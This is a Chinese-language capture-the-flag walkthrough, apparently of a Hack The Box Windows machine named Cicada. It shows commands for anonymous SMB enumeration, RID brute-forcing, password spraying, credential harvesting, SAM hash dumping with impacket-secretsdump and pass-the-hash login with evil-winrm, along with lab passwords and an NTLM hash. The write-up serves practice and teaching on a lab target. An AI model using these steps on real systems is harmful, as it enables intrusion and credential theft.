端口扫描
扫描结果
smb连接
发现开放445端口有smb服务,连接试试
1
2
3
4
5
|
smbclient -L //10.10.11.35
|
发现需要密码使用免密登录试试
1
2
3
4
5
6
7
|
smbclient -N //10.10.11.35
或者
enum4linux -a -u guest 10.10.11.35
|
把这个文件下载下来看看
1
2
3
|
get "Notice from HR.txt"
|
获取到一个默认的密码Cicada$M6Corpb*@Lp#nZp!8
Rid爆破
**crackmapexec **工具使用:https://www.cnblogs.com/Yang34/p/14411497.html
1
2
3
4
5
6
7
|
crackmapexec smb 10.10.11.35 -u "guest" -p "" --rid-brute|grep "SidTypeUser"
或者
nxc smb 10.10.11.35 -u guest -p '' --rid-brute --users
|
这是两个工具爆破得到的结果
其实都是差不多的可以得到用户名列表
1
2
3
|
john.smouldersarah.danteliamichael.wrightsondavid.oreliousemily.oscars
|
遍历用户名密码看哪个正确
1
2
3
|
crackmapexec ldap cicada.htb -u usernames.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
|
发现对michael.wrightson用户可用
enum4linux-ng扫描
使用enum4linux-ng搜集所有与smb服务有关的信息
1
2
3
|
enum4linux-ng -A -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35 -t 10
|
发现了david的密码:aRt$Lp#7t*VQ!3
使用该用户进行smb连接
可以看到有一个文件下载下来使用get “文件名”命令
发现了用户名和密码
winrm登录
1
2
3
|
evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35
|
使用evil-winrm 登录得到用户的flag
SeBackupPrivilege
查看当前用户的权限
关于这个 SeBackupPrivilege:Windows Privilege Escalation: SeBackupPrivilege – Hacking Articles
pypykatz
使用 pypykatz 得到 admin 的 hash 值
impacket-secretsdump
或者使用impacket-secretsdump工具
1
2
3
|
impacket-secretsdump -sam sam -system system LOCAL
|
最后使用 evil-winrm 的 hash 登录到 admin,得到 root.txt
1
2
3
|
evil-winrm -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i 10.10.11.35
|
